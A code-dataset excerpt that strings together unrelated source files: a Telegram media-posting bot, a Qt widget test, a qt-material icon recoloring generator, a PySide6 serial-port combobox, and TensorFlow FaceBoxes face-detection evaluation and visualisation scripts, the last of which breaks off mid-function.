logger.error(msg="Exception was raised:", exc_info=error)
update_str = update.to_dict() if isinstance(update, Update) else str(update)
update_str = json.dumps(update_str, indent=2, ensure_ascii=False)
update_str = html.escape(update_str)
chat_data = html.escape(str(context.chat_data))
user_data = html.escape(str(context.user_data))
message = (
f'An exception was raised while handling an update\n'
f'<pre>update = {update_str}</pre>\n\n'
f'<pre>context.chat_data = {chat_data}</pre>\n\n'
f'<pre>context.user_data = {user_data}</pre>\n\n'
f'<pre>{html.escape(tb_string)}</pre>'
)
context.bot.send_message(chat_id=DEVELOPER_CHAT_ID,
text=message,
parse_mode=ParseMode.HTML)
def check_access_rights(func):
def wrapper(update, context):
chat_id = update.message.chat_id
if chat_id in PRIVILEGED_USERS:
func(update, context)
else:
update.message.reply_text('Not enough access rights!')
return wrapper
def uinfo_handler(update, _):
"""Handle /uinfo cmd. Provide personal Telegram account information."""
user = update.message.from_user
update.message.reply_text(
f'Your Telegram personal info:\n'
f'ID: *{user.id}*\n'
f'Is BOT: *{user.is_bot}*\n\n'
f'First name: *{user.first_name}*\n'
f'Last name : *{user.last_name}*\n'
f'Username : *{user.username}*\n\n'
f'Language code: *{user.language_code}*\n\n'
f'Can join groups : *{user.can_join_groups}*\n'
f'Can read all group messages : *{user.can_read_all_group_messages}*\n'
f'Supports inline queries : *{user.supports_inline_queries}*',
parse_mode=ParseMode.MARKDOWN)
def send_typed_media(resource_path, bot, channel):
"""Send file as bytes by `resource_path`.
Send type based on file extension."""
ext = resource_path.suffix.lower()
media_resource = open(resource_path, 'rb')
if ext in ('.jpeg', '.jpg', '.png'):
return bot.send_photo(chat_id=channel, photo=media_resource)
elif ext in ('.mp4', '.mov', '.gif', '.webp'):
return bot.send_animation(chat_id=channel, animation=media_resource)
def post_next_media(bot, channel, from_path, to_path):
"""Publish first available media file from iterable path object.
After file will be moved to archive folder."""
for item in from_path.iterdir():
if item.is_dir():
continue
message = send_typed_media(item, bot, channel)
if message and hasattr(message, 'date'):
item.replace(to_path.joinpath(item.name))
return message
def publish_next_media_to_channel(context, chat_id):
"""Publish next media to channel now."""
message = post_next_media(context.bot, CHANNEL, RESOURCE_PATH,
PUBLISHED_ARCHIVE)
if message is not None:
message_id = message.message_id
context.bot.send_message(chat_id, f'Published message: #{message_id}')
else:
signal_empty_storage(context.bot, chat_id)
clear(context.bot, context, chat_id)
@check_access_rights
def send_handler(update, context):
"""Handle /send cmd. Publish next media to channel now"""
publish_next_media_to_channel(context, update.message.chat_id)
def send_callback(context):
"""Callback wrapper for publishing next media"""
publish_next_media_to_channel(context, chat_id=context.job.context)
@check_access_rights
def set_handler(update, context):
"""Handle /set cmd. Add a job to the queue."""
chat_id = update.message.chat_id
try:
# args[0] contain the time for the timer in seconds
interval = int(context.args[0])
name = str(chat_id)
if interval < 0:
raise ValueError('Invalid argument')
remove_job_if_exists(str(chat_id), context)
context.job_queue.run_repeating(send_callback, interval,
context=chat_id, name=name)
start_queue_text = f'Next publish will be after {interval} seconds.'
update.message.reply_text(start_queue_text)
except (IndexError, ValueError):
update.message.reply_text('Usage: /set <seconds>')
@check_access_rights
def clear_handler(update, context):
"""Handle /clear cmd. Remove the current job queue."""
chat_id = update.message.chat_id
clear(context.bot, context, chat_id)
def clear(bot, context, chat_id):
"""Clear the job queue by chat_id identifier"""
job_removed = remove_job_if_exists(str(chat_id), context)
text = 'Timer successfully cancelled!' if job_removed else 'You have no active timer.'
bot.send_message(chat_id=chat_id, text=text)
def remove_job_if_exists(name, context):
"""Remove job with given name. Returns whether job was removed."""
current_jobs = context.job_queue.get_jobs_by_name(name)
if not current_jobs:
return False
for job in current_jobs:
job.schedule_removal()
return True
def signal_empty_storage(bot, chat_id):
"""Inform the user that the resource folder does not contain a valid
media file."""
    warn_text = 'Resource folder does not contain an available media resource.'
bot.send_message(chat_id=chat_id, text=warn_text)
def main() -> None:
"""Run bot."""
updater = Updater(API_TOKEN)
# Get the dispatcher to register handlers
dispatcher = updater.dispatcher
dispatcher.add_handler(CommandHandler("start", start_handler))
dispatcher.add_handler(CommandHandler("help", start_handler))
dispatcher.add_handler(CommandHandler("send", send_handler))
dispatcher.add_handler(CommandHandler("set", set_handler))
dispatcher.add_handler(CommandHandler("clear", clear_handler))
dispatcher.add_handler(CommandHandler("uinfo", uinfo_handler))
dispatcher.add_error_handler(error_handler)
updater.start_polling()
# Block until you press Ctrl-C or the process receives SIGINT, SIGTERM or
# SIGABRT. This should be used most of the time, since start_polling() is
# non-blocking and will stop the bot gracefully.
updater.idle()
if __name__ == '__main__':
main()
``` |
{
"source": "5yutan5/QMaterialStyleSheet",
"score": 2
} |
#### File: QMaterialStyleSheet/tests/test_widget_gallery.py
```python
import pytest
from pytestqt.qtbot import QtBot
from qdarktheme.widget_gallery.__main__ import WidgetGallery
@pytest.fixture()
def widget_gallery(qtbot: QtBot) -> WidgetGallery:
"""Create test instance of WidgetGallery."""
widget_gallery = WidgetGallery()
qtbot.add_widget(widget_gallery)
widget_gallery.show()
return widget_gallery
def test_actions(widget_gallery: WidgetGallery, monkeypatch: pytest.MonkeyPatch) -> None:
"""Ensure the actions work correctly."""
from qdarktheme.qtpy.QtWidgets import QMessageBox
for message_type in ("question", "information", "warning", "critical"):
monkeypatch.setattr(QMessageBox, message_type, lambda a, b, c: (a, b, c))
actions = [widget_gallery._ui.action_enable, widget_gallery._ui.action_disable]
actions += widget_gallery._ui.actions_page
actions += widget_gallery._ui.actions_theme
actions += widget_gallery._ui.actions_message_box
actions += widget_gallery._ui.actions_message_box
for action in actions:
action.triggered.emit()
``` |
{
"source": "5yutan5/qt-material",
"score": 2
} |
#### File: qt_material/resources/generate.py
```python
import os
import shutil
from pathlib import Path
HOME = Path.home()
RESOURCES_PATH = os.path.join(HOME, '.qt_material')
########################################################################
class ResourseGenerator:
""""""
# ----------------------------------------------------------------------
def __init__(self, primary, secondary, disabled, source, parent='theme'):
"""Constructor"""
if parent.startswith('/'):
self.index = parent
        elif parent.startswith('.'):
self.index = parent[1:]
else:
self.index = os.path.join(RESOURCES_PATH, parent)
self.contex = [
(os.path.join(self.index, 'disabled'), disabled),
(os.path.join(self.index, 'primary'), primary),
]
self.source = source
self.secondary = secondary
for folder, _ in self.contex:
shutil.rmtree(folder, ignore_errors=True)
os.makedirs(folder, exist_ok=True)
# ----------------------------------------------------------------------
def generate(self):
""""""
for icon in os.listdir(self.source):
if not icon.endswith('.svg'):
continue
with open(os.path.join(self.source, icon), 'r') as file_input:
content_original = file_input.read()
for folder, color in self.contex:
new_content = self.replace_color(content_original, color)
new_content = self.replace_color(
new_content, self.secondary, '#ff0000')
file_to_write = os.path.join(folder, icon)
with open(file_to_write, 'w') as file_output:
file_output.write(new_content)
# ----------------------------------------------------------------------
def replace_color(self, content, replace, color='#0000ff'):
""""""
colors = [color] + [''.join(list(color)[:i] +
['\\\n'] + list(color)[i:]) for i in range(1, 7)]
for c in colors:
content = content.replace(c, replace)
replace = '#ffffff00'
color = '#000000'
colors = [color] + [''.join(list(color)[:i] +
['\\\n'] + list(color)[i:]) for i in range(1, 7)]
for c in colors:
content = content.replace(c, replace)
return content
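# --- Illustrative usage sketch added by the editor; the colors and source path
# below are assumptions for demonstration only. ---
# gen = ResourseGenerator(primary='#2196f3', secondary='#ff9800',
#                         disabled='#9e9e9e', source='./svg')
# gen.generate()  # writes recolored icon copies into ~/.qt_material/theme/{primary,disabled}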
``` |
{
"source": "5yutan5/SerialMonitor",
"score": 3
} |
#### File: SerialMonitor/serialMonitor/widgets.py
```python
from typing import Union
from PySide6.QtWidgets import QComboBox
from serial.tools import list_ports
from serial.tools.list_ports_common import ListPortInfo
class PortCombobox(QComboBox):
def __init__(self, filter: str = None) -> None:
super().__init__()
self._port_infos = []
self._default_text = "Select Port"
self.filter = "" if filter is None else filter
self.addItem(self._default_text)
def get_current_port_info(self) -> Union[ListPortInfo, None]:
return (
None
if len(self._port_infos) == 0
else self._port_infos[self.currentIndex()]
)
def showPopup(self) -> None:
self._port_infos.clear()
self.clear()
self._port_infos = [
port
for port in list_ports.comports()
if self.filter in str(port.description)
]
if len(self._port_infos) == 0:
self.addItem(self._default_text)
else:
self.addItems([str(port.description) for port in self._port_infos])
width = self.view().sizeHintForColumn(0)
self.view().setMinimumWidth(width)
super().showPopup()
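# --- Illustrative usage sketch added by the editor; not part of the original module. ---
# from PySide6.QtWidgets import QApplication
# app = QApplication([])
# combo = PortCombobox(filter="USB")  # list only ports whose description contains "USB"
# combo.show()
# app.exec()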
``` |
{
"source": "602p/starfighter_revival",
"score": 3
} |
#### File: 602p/starfighter_revival/ui.py
```python
import pygame, game, ship, math
class Radar:
def __init__(self, player, screen):
self.ring_count=10
self.extra_time=7
self.ring_spacing=10
self.ring_timing=50
self.full_scale=5000
self.curr_ring=0
self.curr_ring_time=pygame.time.get_ticks()
self.sz=(self.ring_count+1)*self.ring_spacing*2
self.rect=pygame.Rect(screen.get_width()-self.sz, 0, self.sz, self.sz)
self.fill_surf=pygame.Surface(self.rect.size).convert_alpha()
self.fill_surf.fill((150,150,150,80))
self.screen=screen
self.player=player
self.scale_factor=self.sz/self.full_scale
self.green_arrow = game.get_image("assets/radar/green_arrow.png").convert_alpha()
self.red_arrow = game.get_image("assets/radar/red_arrow.png").convert_alpha()
self.grey_arrow = game.get_image("assets/radar/grey_arrow.png").convert_alpha()
self.target_icon = game.get_image("assets/radar/target.png").convert_alpha()
def render(self, dt):
if pygame.time.get_ticks()-self.curr_ring_time>self.ring_timing:
self.curr_ring+=1
self.curr_ring_time=pygame.time.get_ticks()
if self.curr_ring>self.ring_count+self.extra_time:
self.curr_ring=0
pygame.draw.rect(self.screen, (200,200,200,100), self.rect, 4)
self.screen.blit(self.fill_surf, self.rect)
for i in range(self.ring_count):
pygame.draw.circle(self.screen,
(255,255,255) if i==self.curr_ring else (150,150,150), self.rect.center, (i+1)*self.ring_spacing, 1)
for e in list(game.client.owned_entities.values()):
self.draw_ship(e)
for e in list(game.client.remote_entities.values()):
self.draw_ship(e)
def draw_ship(self, e):
if e.faction==self.player.faction and e.type.raw.get("render_only_for_enemy"):
return
icon=(self.grey_arrow if e is self.player else self.green_arrow) if e.faction==self.player.faction else self.red_arrow
self.screen.blit(icon, (0,0))
image, rect = ship.rot_center(icon, icon.get_rect(), e.angle)
rect=rect.move(((e.rect.centerx-self.player.rect.centerx)*self.scale_factor,
(e.rect.centery-self.player.rect.centery)*self.scale_factor))
if math.sqrt((rect.centerx**2)+(rect.centery**2))>(self.sz/2)-10:
return
rect=rect.move(self.rect.center).move((-icon.get_width()/2, -icon.get_height()/2))
overlay_pos=(((e.rect.centerx-self.player.rect.centerx)*self.scale_factor)+self.rect.centerx-(e.type.map_icon.get_width()/2),
((e.rect.centery-self.player.rect.centery)*self.scale_factor)+self.rect.centery-(e.type.map_icon.get_height()/2))
self.screen.blit(e.type.map_icon, (overlay_pos[0], overlay_pos[1]-5))
if e.type.do_normal_map_icon:
self.screen.blit(image, rect)
if rect.collidepoint(pygame.mouse.get_pos()):
if pygame.mouse.get_pressed()[0]:
if e.faction!=self.player.faction:
self.player.target=e
# pygame.draw.rect(self.screen, (255,0,0), rect, 2)
if e is self.player.target:
self.screen.blit(self.target_icon, overlay_pos)
``` |
{
"source": "602p/yeezip",
"score": 3
} |
#### File: src/extentions/shell.py
```python
import traceback
print("(Hacky shell running inside yeezip!)")
run=1
def quit():
global run
run=0
while run:
try:
print(eval(input(">>> ")))
except BaseException as e:
traceback.print_exc()
```
#### File: 602p/yeezip/test.py
```python
import subprocess, sys, os
class SubprocessReturnValue:
def __init__(self, code, value):
self.code=code
self.value=value.decode('ascii', 'ignore')
def __str__(self): return self.value
def __eq__(self, other): return other==self.value
def __contains__(self, k): return k in self.value
def call(*args):
try:
return SubprocessReturnValue(0, subprocess.check_output(args))
except subprocess.CalledProcessError as e:
return SubprocessReturnValue(e.returncode, e.output)
def callc(*args):
return call("./compress", *args)
def test(val, msg):
if not val:
global bueno
bueno=False
print("\033[91m***FAILED: "+msg+"!***\033[0m")
if "nointeg" not in sys.argv:
bueno=True
os.system("python3 -m build espam lln rbx nr")
print("Running Integration tests... ")
test("No operation" in callc(), "Accepted no args")
test("Base Usage" in callc("-h"), "Didn't provide help")
test(""==callc("-q"), "Didn't shut up with -q")
test("Compressing" in callc("-c", "samples/hexdata.txt", "-o", "out.yz", "-astatic", "-ptree=hex2"),\
"Didn't tell me it was compressing")
test("Decompressing" in callc("-x", "out.yz", "-o", "out.txt"), "Didn't tell me it was decompressing")
test(""==call("diff", "samples/hexdata.txt", "out.txt"), "Input != output")
test(""==callc("-c", "samples/hexdata.txt", "-o", "out.yz", "-astatic", "-ptree=hex2", "-q"),\
"Didn't shut up when compressing for real")
test("Char 0 was found in file but not in LookupTable, ignoring" in \
callc("-c", "samples/hexdata.txt", "-o", "out.yz", "-astatic", "-ptree=abc"),\
"Didn't warn when compressing with bad tree")
test("Extention deeznuts not found" in \
callc("-c", "samples/hexdata.txt", "-o", "out.yz", "-adeeznuts"),\
"Didn't fail with invalid extension")
test("Saving tree" in callc("-c", "samples/hexdata_small.txt", "-o", "out.yz", "-O", "-s", "out.yt",
"-astatic", "-ptree=hex2"), "Didn't save tree outside of file")
test("HF_NOTREE set" in callc("-x", "out.yz", "-o", "out.txt"), "Didn't fail w/o tree (or tree was saved)")
test(callc("-x", "out.yz", "-o", "out.txt", "-l", "out.yt").code==0, "Failed to decompress w/ external tree")
test(""==call("diff", "samples/hexdata_small.txt", "out.txt"), "Input != output when using external tree")
call("rm", "out.yz", "out.yt", "out.txt")
if bueno:
print("\033[92m\t\t\t\t\tALL GOOD!\033[0m")
if "nounit" not in sys.argv:
print("Running unittests...")
os.system("python3 -m build tests")
``` |
{
"source": "603721847/GPT2-NewsTitle",
"score": 3
} |
#### File: 603721847/GPT2-NewsTitle/app.py
```python
import streamlit as st
from model import GPT2LMHeadModel
from transformers import BertTokenizer
import argparse
import os
import torch
import time
from generate_title import predict_one_sample
st.set_page_config(page_title="Demo", initial_sidebar_state="auto", layout="wide")
@st.cache()
def get_model(device, vocab_path, model_path):
tokenizer = BertTokenizer.from_pretrained(vocab_path, do_lower_case=True)
model = GPT2LMHeadModel.from_pretrained(model_path)
model.to(device)
model.eval()
return tokenizer, model
device_ids = 0
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICE"] = str(device_ids)
device = torch.device("cuda" if torch.cuda.is_available() and int(device_ids) >= 0 else "cpu")
tokenizer, model = get_model(device, "vocab/vocab.txt", "output_dir/checkpoint-111844")
def writer():
st.markdown(
"""
## NewsTitleGenerate DEMO
"""
)
    st.sidebar.subheader("Configuration parameters")
batch_size = st.sidebar.slider("batch_size", min_value=0, max_value=10, value=3)
generate_max_len = st.sidebar.number_input("generate_max_len", min_value=0, max_value=64, value=32, step=1)
repetition_penalty = st.sidebar.number_input("repetition_penalty", min_value=0.0, max_value=10.0, value=1.2,
step=0.1)
top_k = st.sidebar.slider("top_k", min_value=0, max_value=10, value=3, step=1)
top_p = st.sidebar.number_input("top_p", min_value=0.0, max_value=1.0, value=0.95, step=0.01)
parser = argparse.ArgumentParser()
    parser.add_argument('--batch_size', default=batch_size, type=int, help='number of titles to generate')
    parser.add_argument('--generate_max_len', default=generate_max_len, type=int, help='maximum length of a generated title')
    parser.add_argument('--repetition_penalty', default=repetition_penalty, type=float, help='repetition penalty')
    parser.add_argument('--top_k', default=top_k, type=float, help='keep only the top-k most probable tokens when decoding')
    parser.add_argument('--top_p', default=top_p, type=float, help='keep tokens whose cumulative probability exceeds top_p when decoding')
    parser.add_argument('--max_len', type=int, default=512, help='maximum model input length; must be smaller than n_ctx in the config')
args = parser.parse_args()
    content = st.text_area("Enter the news article text", max_chars=512)
    if st.button("Generate title"):
        start_message = st.empty()
        start_message.write("Generating, please wait...")
        start_time = time.time()
        titles = predict_one_sample(model, tokenizer, device, args, content)
        end_time = time.time()
        start_message.write("Done, took {}s".format(end_time - start_time))
        for i, title in enumerate(titles):
            st.text_input("Result {}".format(i + 1), title)
else:
st.stop()
if __name__ == '__main__':
writer()
``` |
{
"source": "605258778/newsScrapy",
"score": 2
} |
#### File: 605258778/newsScrapy/pipelines.py
```python
import json
import codecs
from scrapy.exceptions import DropItem
from model.config import DBSession
from model.config import Redis
from model.article import Article
# Deduplication: drop items whose URL has already been seen
class DuplicatesPipeline(object):
def process_item(self, item, spider):
if Redis.exists('url:%s' % item['url']):
raise DropItem("Duplicate item found: %s" % item)
else:
Redis.set('url:%s' % item['url'],1)
return item
# Store items in the database
class DataBasePipeline(object):
def open_spider(self, spider):
self.session = DBSession()
def process_item(self, item, spider):
a = Article(title=item["title"].encode("utf-8"),
url=item["url"],
content=item["content"].encode("utf-8"),
publish_time=item["publish_time"].encode("utf-8"),
publish_user=item["publish_user"].encode("utf-8"),
folder_id=2)
self.session.add(a)
self.session.commit()
def close_spider(self,spider):
self.session.close()
# Store items in a file
class JsonWriterPipeline(object):
def __init__(self):
self.file = codecs.open('items.json', 'w', encoding='utf-8')
def process_item(self, item, spider):
line = json.dumps(dict(item)) + "\n"
self.file.write(line.decode('unicode_escape'))
return item
# Crawl only a fixed number of items (100)
class CountDropPipline(object):
def __init__(self):
self.count = 100
def process_item(self, item, spider):
if self.count == 0:
raise DropItem("Over item found: %s" % item)
else:
self.count -= 1
return item
```
#### File: 605258778/newsScrapy/run.py
```python
from spiders.deep_spider import DeepSpider
from model.config import DBSession
from model.rule import Rule
from scrapy.crawler import CrawlerProcess
from scrapy.settings import Settings
import os,time
from twisted.internet import task
from twisted.internet import reactor
from twisted.internet.protocol import Protocol, ServerFactory
import sys
def run():
    print(sys.modules['twisted.internet.reactor'])
settings = Settings()
# crawl settings
settings.set("USER_AGENT", "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36")
settings.set("ITEM_PIPELINES" , {
'pipelines.DuplicatesPipeline': 200,
# 'pipelines.CountDropPipline': 100,
'pipelines.DataBasePipeline': 300,
})
process = CrawlerProcess(settings)
db = DBSession()
rules = db.query(Rule).filter(Rule.enable == 1)
for rule in rules:
process.crawl(DeepSpider,rule)
process.start()
run()
``` |
{
"source": "605data/skeddly-sdk-python",
"score": 3
} |
#### File: skeddly-sdk-python/examples/list_actions_by_credential.py
```python
import skeddly
def Main():
client = skeddly.Client()
try:
# Get the list of credentials in our Skeddly account
credentials = client.list_credentials()
print("%d credential(s) found." % len(credentials))
for c in credentials:
credentialId = c['credentialId']
credentialName = c['name']
print("Credential: %s (%s)" % (credentialName, credentialId))
# Get the actions associated with this credential
actions = client.list_actions(
filter={
"credentialIds": credentialId
})
# Print out each action found for this credential
for a in actions:
actionId = a['actionId']
actionName = a['name']
print("\tAction: %s (%s)" % (actionName, actionId))
print("")
except skeddly.ParameterValidationFailedException as e:
print("Error: " + str(e))
print("ErrorCode:" + e.errorCode)
print("modelState: " + str(e.modelState))
except skeddly.SkeddlyWebException as e:
print("Error: " + str(e))
print("ErrorCode:" + e.errorCode)
if __name__ == "__main__":
Main()
``` |
{
"source": "60East/amps-demo-positions-view-server",
"score": 3
} |
#### File: amps-demo-positions-view-server/publishers/all.py
```python
from multiprocessing import Process
from signal import signal, SIGTERM
from customers import publish_customer_data
from executions import publish_execution_data
from market_data import publish_market_data
execution = None
market_data = None
def sigterm_handler(signum, frame):  # signal handlers receive (signum, frame)
if execution:
execution.terminate()
if market_data:
market_data.terminate()
if __name__ == '__main__':
signal(SIGTERM, sigterm_handler)
# publish companies first
publish_customer_data()
# run other publishes in parallel
execution = Process(target=publish_execution_data)
market_data = Process(target=publish_market_data)
execution.start()
market_data.start()
execution.join()
market_data.join()
``` |
{
"source": "60-lines-of-python/calculator",
"score": 3
} |
#### File: 60-lines-of-python/calculator/calc_runner.py
```python
from calc import Calculator
def repl():
calc = Calculator()
while True:
line = input('> ')
try:
print(calc.parse(line))
except SyntaxError as e:
print(f'Syntax Error: {e.msg}')
def bad_repl_do_not_use():
while True:
print(eval(input('> ')))
if __name__ == '__main__':
repl()
#bad_repl_do_not_use() # Can do: __import__('os').system('dir')
``` |
{
"source": "60noy/git-stalk-cli",
"score": 3
} |
#### File: git-stalk-cli/tests/test_user_existence.py
```python
import os
def test_non_existing():
    # GitHub usernames may only contain alphanumeric characters or hyphens,
    # so there is no way that an account with the username _O_ exists
process = os.popen('stalk _O_')
output = process.read()
# If API limit is reached, there's no way to test this case
if "API" in output or len(output)<=1:
assert(True)
else:
assert("does not exists" in output)
process.close()
def test_existing():
process = os.popen('stalk 1')
output = process.read()
# If API limit is reached, there's no way to test this case
if "API" in output or len(output)<=1:
assert(True)
else:
assert("followers" in output.lower())
process.close()
``` |
{
"source": "610265158/faceboxes-tensorflow",
"score": 3
} |
#### File: core/api/face_detector.py
```python
import tensorflow as tf
import numpy as np
import cv2
import time
from train_config import config as cfg
from lib.core.model.facebox.net import FaceBoxes
class FaceDetector:
def __init__(self, model_path):
"""
Arguments:
model_path: a string, path to the model params file.
"""
self.model=tf.saved_model.load(model_path)
def __call__(self, image, score_threshold=0.5):
"""Detect faces.
Arguments:
image: a numpy uint8 array with shape [height, width, 3],
that represents a RGB image.
score_threshold: a float number.
Returns:
boxes: a float numpy array of shape [num_faces, 5].
"""
image_fornet,scale_x,scale_y=self.preprocess(image,target_width=cfg.MODEL.win,target_height=cfg.MODEL.hin)
image_fornet = np.expand_dims(image_fornet, 0)
start=time.time()
res= self.model.inference(image_fornet)
        print('inference time:', time.time() - start)
boxes=res['boxes'].numpy()
scores=res['scores'].numpy()
num_boxes=res['num_boxes'].numpy()
num_boxes = num_boxes[0]
boxes = boxes[0][:num_boxes]
scores = scores[0][:num_boxes]
to_keep = scores > score_threshold
boxes = boxes[to_keep]
scores = scores[to_keep]
        ### recover boxes to raw image coordinates
scaler = np.array([cfg.MODEL.hin/scale_y,
cfg.MODEL.win/scale_x,
cfg.MODEL.hin/scale_y,
cfg.MODEL.win/scale_x], dtype='float32')
boxes = boxes * scaler
scores=np.expand_dims(scores, 0).reshape([-1,1])
#####the tf.nms produce ymin,xmin,ymax,xmax, swap it in to xmin,ymin,xmax,ymax
for i in range(boxes.shape[0]):
boxes[i] = np.array([boxes[i][1], boxes[i][0], boxes[i][3],boxes[i][2]])
return np.concatenate([boxes, scores],axis=1)
def preprocess(self,image,target_height,target_width,label=None):
###sometimes use in objs detects
h,w,c=image.shape
bimage=np.zeros(shape=[target_height,target_width,c],dtype=image.dtype)+np.array(cfg.DATA.PIXEL_MEAN,dtype=image.dtype)
long_side=max(h,w)
scale_x=scale_y=target_height/long_side
image=cv2.resize(image, None,fx=scale_x,fy=scale_y)
h_,w_,_=image.shape
bimage[:h_, :w_, :] = image
return bimage,scale_x,scale_y
def init_model(self,*args):
if len(args) == 1:
use_pb = True
pb_path = args[0]
else:
use_pb = False
meta_path = args[0]
restore_model_path = args[1]
def ini_ckpt():
graph = tf.Graph()
graph.as_default()
configProto = tf.ConfigProto()
configProto.gpu_options.allow_growth = True
sess = tf.Session(config=configProto)
# load_model(model_path, sess)
saver = tf.train.import_meta_graph(meta_path)
saver.restore(sess, restore_model_path)
print("Model restred!")
return (graph, sess)
def init_pb(model_path):
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
compute_graph = tf.Graph()
compute_graph.as_default()
sess = tf.Session(config=config)
with tf.gfile.GFile(model_path, 'rb') as fid:
graph_def = tf.GraphDef()
graph_def.ParseFromString(fid.read())
tf.import_graph_def(graph_def, name='')
# saver = tf.train.Saver(tf.global_variables())
# saver.save(sess, save_path='./tmp.ckpt')
return (compute_graph, sess)
if use_pb:
model = init_pb(pb_path)
else:
model = ini_ckpt()
graph = model[0]
sess = model[1]
return graph, sess
```
#### File: faceboxes-tensorflow/test/fddb.py
```python
import sys
sys.path.append('.')
import numpy as np
import os
import cv2
from tqdm import tqdm
import argparse
from lib.core.api.face_detector import FaceDetector
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
ap = argparse.ArgumentParser()
ap.add_argument( "--model", required=True, default='', help="model to eval:")
ap.add_argument( "--is_show", required=False, default=False, help="show result or not?")
ap.add_argument( "--data_dir", required=False, default="./FDDB/img", help="dir to img")
ap.add_argument( "--split_dir", required=False,default='./FDDB/FDDB-folds',help="dir to FDDB-folds")
ap.add_argument( "--result", required=False,default='./result',help="dir to write result")
args = ap.parse_args()
IMAGES_DIR = args.data_dir
ANNOTATIONS_PATH = args.split_dir
RESULT_DIR = args.result
if not os.access(RESULT_DIR,os.F_OK):
os.mkdir(RESULT_DIR)
face_detector = FaceDetector(args.model)
annotations = [s for s in os.listdir(ANNOTATIONS_PATH) if s.endswith('ellipseList.txt')]
image_lists = [s for s in os.listdir(ANNOTATIONS_PATH) if not s.endswith('ellipseList.txt')]
annotations = sorted(annotations)
image_lists = sorted(image_lists)
images_to_use = []
for n in image_lists:
with open(os.path.join(ANNOTATIONS_PATH, n)) as f:
images_to_use.extend(f.readlines())
images_to_use = [s.strip() for s in images_to_use]
with open(os.path.join(RESULT_DIR, 'faceList.txt'), 'w') as f:
for p in images_to_use:
f.write(p + '\n')
ellipses = []
for n in annotations:
with open(os.path.join(ANNOTATIONS_PATH, n)) as f:
ellipses.extend(f.readlines())
i = 0
with open(os.path.join(RESULT_DIR, 'ellipseList.txt'), 'w') as f:
for p in ellipses:
# check image order
if 'big/img' in p:
assert images_to_use[i] in p
i += 1
f.write(p)
def bbox_vote(det):
order = det[:, 4].ravel().argsort()[::-1]
det = det[order, :]
while det.shape[0] > 0:
# IOU
area = (det[:, 2] - det[:, 0] + 1) * (det[:, 3] - det[:, 1] + 1)
xx1 = np.maximum(det[0, 0], det[:, 0])
yy1 = np.maximum(det[0, 1], det[:, 1])
xx2 = np.minimum(det[0, 2], det[:, 2])
yy2 = np.minimum(det[0, 3], det[:, 3])
w = np.maximum(0.0, xx2 - xx1 + 1)
h = np.maximum(0.0, yy2 - yy1 + 1)
inter = w * h
o = inter / (area[0] + area[:] - inter)
# get needed merge det and delete these det
merge_index = np.where(o >= 0.3)[0]
det_accu = det[merge_index, :]
det = np.delete(det, merge_index, 0)
if merge_index.shape[0] <= 1:
continue
det_accu[:, 0:4] = det_accu[:, 0:4] * np.tile(det_accu[:, -1:], (1, 4))
max_score = np.max(det_accu[:, 4])
det_accu_sum = np.zeros((1, 5))
det_accu_sum[:, 0:4] = np.sum(det_accu[:, 0:4], axis=0) / np.sum(det_accu[:, -1:])
det_accu_sum[:, 4] = max_score
try:
dets = np.row_stack((dets, det_accu_sum))
except:
dets = det_accu_sum
dets = dets[0:750, :]
return dets
predictions = []
for n in tqdm(images_to_use):
image_array = cv2.imread(os.path.join(IMAGES_DIR, n) + '.jpg')
image_array = cv2.cvtColor(image_array, cv2.COLOR_BGR2RGB)
# threshold is important to set low
boxes = face_detector(image_array, score_threshold=0.05)
flip_img=np.flip(image_array,1)
boxes_flip_ = face_detector(flip_img, score_threshold=0.05)
boxes_flip = np.zeros(boxes_flip_.shape)
boxes_flip[:, 0] = flip_img.shape[1] - boxes_flip_[:, 2]
boxes_flip[:, 1] = boxes_flip_[:, 1]
boxes_flip[:, 2] = flip_img.shape[1] - boxes_flip_[:, 0]
boxes_flip[:, 3] = boxes_flip_[:, 3]
boxes_flip[:, 4] = boxes_flip_[:, 4]
#####
det = np.row_stack((boxes,boxes_flip ))
dets = bbox_vote(det)
boxes=dets
#
# if args.is_show:
# for bbox in dets:
# if bbox[4] > 0.3:
# # cv2.circle(img_show,(p[0],p[1]),3,(0,0,213),-1)
# cv2.rectangle(image_array, (int(bbox[0]), int(bbox[1])),
# (int(bbox[2]), int(bbox[3])), (255, 0, 0), 7)
# cv2.imshow('tmp', image_array)
# cv2.waitKey(0)
###
predictions.append((n, boxes[:,0:4], boxes[:,4]))
with open(os.path.join(RESULT_DIR, 'detections.txt'), 'w') as f:
for n, boxes, scores in predictions:
f.write(n + '\n')
f.write(str(len(boxes)) + '\n')
for b, s in zip(boxes, scores):
xmin, ymin, xmax, ymax = b
h, w = int(ymax - ymin+1), int(xmax - xmin+1)
f.write('{0} {1} {2} {3} {4:.4f}\n'.format(int(xmin), int(ymin), w, h, s))
```
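As a sanity check, here is a tiny self-contained call to the `bbox_vote` helper above (assuming it is importable or pasted into the same session). Each overlapping pair below should collapse to a single score-weighted box; note that an isolated detection with no partner above the 0.3 IoU threshold is dropped by this implementation.
```python
import numpy as np

# Two clusters of overlapping detections, rows are [xmin, ymin, xmax, ymax, score].
det = np.array([
    [10., 10., 50., 50., 0.90],
    [12., 11., 52., 49., 0.60],
    [200., 200., 240., 240., 0.80],
    [198., 202., 238., 242., 0.70],
])
merged = bbox_vote(det)
print(merged)  # one score-weighted box per overlapping cluster (score = cluster max)
```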
#### File: 610265158/faceboxes-tensorflow/vis.py
```python
import cv2
import os
import time
import argparse
from lib.core.api.face_detector import FaceDetector
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import os
def GetFileList(dir, fileList):
newDir = dir
if os.path.isfile(dir):
fileList.append(dir)
elif os.path.isdir(dir):
for s in os.listdir(dir):
# if s == "pts":
# continue
newDir=os.path.join(dir,s)
GetFileList(newDir, fileList)
return fileList
def image_demo(data_dir):
args.model
detector = FaceDetector(args.model)
count = 0
pics = []
GetFileList(data_dir,pics)
pics = [x for x in pics if 'jpg' in x or 'png' in x]
#pics.sort()
for pic in pics:
img=cv2.imread(pic)
img_show = img.copy()
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
star=time.time()
boxes=detector(img,0.3)
        #print('one image cost %f s'%(time.time()-star))
#print(boxes.shape)
#print(boxes)
################toxml or json
print(boxes.shape[0])
if boxes.shape[0]==0:
